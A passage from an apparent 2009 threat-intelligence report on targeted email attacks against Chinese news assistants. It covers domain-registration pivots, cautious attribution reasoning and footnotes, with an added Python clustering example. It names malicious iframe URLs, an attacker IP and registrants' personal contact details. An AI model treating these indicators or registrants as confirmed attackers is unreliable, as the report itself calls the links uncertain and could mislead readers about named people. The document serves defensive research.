The domain names pc-officer.com and amberice.com were registered in 2007 to “wei zheng” using the email address “sunny@hetu.cn” and the phone number “86-010-4564654.” There are some links between these data and the registration data of other domain names. For example, a “wei zheng” also registered “fclinux.com” with the email address “asdfi@hotmail.com” and the phone number “86 10 13810358162,” and the same “wei zheng” registered “winxpupdata.com” with the same phone number “86 10 13810358162” and the email address “afsaf@hotmail.com.” A variety of domain names, such as ag365.com, are registered to “Hetu Time Networking Technology Ltd.” in the name of “lin long” with the email address “harry@hetu.cn.” However, the technical contact is “lin hai” with the email address “sunny@hetu.cn.”

It is unclear what the connection is here as “hetu.cn” is a domain registrar and hosting company. It is possible that the information is not connected to the attackers, but others who have been compromised by the attackers.
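The registration pivoting described above can be made mechanical. The following Python example, added here and not part of the original report, builds records from the registration details quoted above, normalises email addresses and phone numbers, and groups domains that share a value using a union-find. Pivoting on the registrant name alone is the weak link, since a common name such as “wei zheng” proves little, so the function takes the attribute kinds to pivot on as a parameter and the caller can compare the grouping with and without the name. The record layout, field names and function names are my own.

```python
"""Added example (not from the report): pivot on WHOIS registrant data with
a union-find over shared, normalised attribute values. Record layout and
function names are my own; the values come from the details quoted above."""
import re
from collections import defaultdict

# Constructed from the registration details in the text above.
RECORDS = [
    {"domain": "pc-officer.com", "name": "wei zheng", "email": "sunny@hetu.cn",
     "phone": "86-010-4564654"},
    {"domain": "amberice.com", "name": "wei zheng", "email": "sunny@hetu.cn",
     "phone": "86-010-4564654"},
    {"domain": "fclinux.com", "name": "wei zheng", "email": "asdfi@hotmail.com",
     "phone": "86 10 13810358162"},
    {"domain": "winxpupdata.com", "name": "wei zheng", "email": "afsaf@hotmail.com",
     "phone": "86 10 13810358162"},
    {"domain": "ag365.com", "name": "lin long", "email": "harry@hetu.cn",
     "tech_name": "lin hai", "tech_email": "sunny@hetu.cn"},
]

# Which record fields count as which pivot kind; tech contacts pivot like registrants.
FIELD_KIND = {"name": "name", "tech_name": "name", "email": "email",
              "tech_email": "email", "phone": "phone"}


def normalise(kind, value):
    """Canonical node label: lower-case, and digits only for phone numbers so
    that '86-010-4564654' and '86 010 4564654' compare equal."""
    value = value.strip().lower()
    if kind == "phone":
        value = re.sub(r"\D", "", value)
    return f"{kind}:{value}"


class UnionFind:
    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x

    def union(self, a, b):
        ra, rb = self.find(a), self.find(b)
        if ra != rb:
            self.parent[ra] = rb


def _attribute_nodes(record, kinds):
    """Normalised attribute labels of a record, restricted to the chosen kinds."""
    for field, value in record.items():
        kind = FIELD_KIND.get(field)
        if kind in kinds:
            yield normalise(kind, value)


def pivot(records, kinds):
    """Group domains connected through any shared attribute of the given kinds.
    Returns a sorted list of sorted domain lists."""
    uf = UnionFind()
    for rec in records:
        for node in _attribute_nodes(rec, kinds):
            uf.union("domain:" + rec["domain"], node)
    groups = defaultdict(set)
    for rec in records:
        groups[uf.find("domain:" + rec["domain"])].add(rec["domain"])
    return sorted(sorted(g) for g in groups.values())


def shared_attributes(records, kinds):
    """Attribute values that link two or more domains, with those domains."""
    owners = defaultdict(set)
    for rec in records:
        for node in _attribute_nodes(rec, kinds):
            owners[node].add(rec["domain"])
    return {node: doms for node, doms in owners.items() if len(doms) > 1}


if __name__ == "__main__":
    print("email+phone only:", pivot(RECORDS, {"email", "phone"}))
    print("with name:       ", pivot(RECORDS, {"email", "phone", "name"}))
    for node, doms in shared_attributes(RECORDS, {"email", "phone"}).items():
        print(f"  {node} -> {sorted(doms)}")
```

With only email and phone as pivots the five domains fall into two clusters, one held together by sunny@hetu.cn and one by the shared phone number; only the registrant name joins the two, which is exactly the link an analyst should weigh least. Printing shared_attributes shows which value did the joining, so each edge in the cluster can be checked against the caveat in the text that hetu.cn is itself a registrar and host.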

There is another avenue of inquiry that impacts attribution. It is not clear how the email addresses of the recipients, who are local employees for foreign journalists, were acquired by the attackers.13 The Reuters news story about the targeted email attacks makes an important point about those who were targeted:

The “Pam Bourdon” emails on Monday targeted Chinese news assistants, whose names often do not appear on news reports and who must be hired through an agency that reports to the Foreign Ministry.14

Considering that the contact information of these assistants was not publicly known, but was known to China’s Foreign Ministry, an element of suspicion is raised concerning the involvement of the latter. However, there are alternative explanations for how the attackers were able to assemble the list of contacts. These attackers have been actively compromising targets since at least 2007, and likely compile lists of new targets from information acquired through previous exploits. In fact, the accuracy of the email used in this case, and the malicious attachment, suggest that the attackers leveraged information stolen from previously compromised computers.

There is no evidence that directly implicates the government of China in these attacks.

However, both the timing and targets of the attack do raise questions. With the 60th anniversary of the People’s Republic of China fast approaching, it is difficult to dismiss attacks on high profile media targets such as Reuters, the Straits Times, Dow Jones, Agence France Presse, and Ansa as random events. These organizations were targeted directly, but the motivation of the attackers remains unknown. Furthermore, the use of compromised servers at the National Central University of Taiwan and the Taiwan Academic Network will no doubt add to an already tense relationship between China and Taiwan.

About IWM

The Information Warfare Monitor (www.infowar-monitor.net) is an advanced research activity tracking the emergence of cyberspace as a strategic domain. The IWM is a public-private venture between two Canadian institutions: the Citizen Lab at the Munk Centre for International Studies, University of Toronto and The SecDev Group, an operational think tank based in Ottawa (Canada).

About Malware Lab

The Malware Lab (www.malwarelab.org) is an independent research collective comprised of volunteers that investigates and reports on politically motivated malware attacks, primarily against civil society organizations. The ML combines technical data with socio-political contextual analysis in order to better understand the capabilities and motivations of the attackers as well as the overall effects and broader implications of targeted attacks.

Notes

[1] See http://www.fccchina.org/2009/09/21/warning-on-fake-emails-targeting-news-assistants/ and http://www.reuters.com/article/internetNews/idUSTRE58L0LJ20090922

[2] http://edition.cnn.com/2009/WORLD/asiapcf/09/21/china.national.day/

[3] http://www.pcworld.com/article/172627/china_clamps_down_on_internet_ahead_of_60th_anniversary.html , http://ifex.org/china/2009/09/23/censorship_and_cyber_attacks/

[4] This follows an investigation of the FCCC’s web server conducted last month. The FCCC’s WordPress installation was compromised and malicious “iframes” were inserted which loaded www.nontopworld.com/homepage.htm and www.nontopworld.com/mainpage.htm. The IP address for nontopworld.com (58.64.130.11) appears on a list of IP addresses linked to the Russian Business Network (RBN). http://doc.emergingthreats.net/pub/Main/RussianBusinessNetwork/RussianBusinessNetworkIPs.txt

[5] http://www.weforum.org/en/events/ArchivedEvents/AnnualMeetingoftheNewChampions2009/index.htm

[6] http://www.virustotal.com/analisis/dbcdddc779877d4ca2e30b6d21d407f661379155775ae39ec545984095ed07dd-1253586587

[7] http://isc.sans.org/diary.html?storyid=3400, http://www.daemon.be/maarten/Crouching_Powerpoint_Hidden_Trojan_24C3.pdf, http://www.daemon.be/maarten/targetedattacks.html, http://www.virustotal.com/analisis/755530853391444e729220443ce869e908f060c345b2c2aaac8b3cb5e6bffe7a-1190194670, http://www.virustotal.com/analisis/f5eaf65eefad528e6e46cb9c51ae3fb07b9f9b851a338235d787c963a47f80d6-1223527899, http://www.virustotal.com/analisis/d77f3145624c2ae20581265773d509d7ee9ad7e65ba187b891f777feb794ebfb-1190849733

[8] http://www.f-secure.com/weblog/archives/00001649.html and http://www.virustotal.com/analisis/cc15b6402c507364a41c32f8b4176670bc609259543523d42a865c2823b6dd2e-1238734246

[9] http://www.cc.ncu.edu.tw/Eng_faq/anti-virus.php

[10] http://blog.threatexpert.com/2009/02/politically-motivated-trojan.html, http://www.threatexpert.com/report.aspx?md5=02f2029647e85fff81620b2c333bc9cf and http://www.threatexpert.com/report.aspx?md5=7ce96a0ed4d71c26d2c377dd331e4466

[11] http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network

[12] http://www.businessweek.com/magazine/content/08_16/b4080032218430_page_4.htm

[13] http://www.themalaysianinsider.com/index.php/world/38375-e-mail-viruses-target-foreign-media-in-china

[14] http://www.nytimes.com/reuters/2009/09/22/world/international-us-china-cyberattack.html?_r=1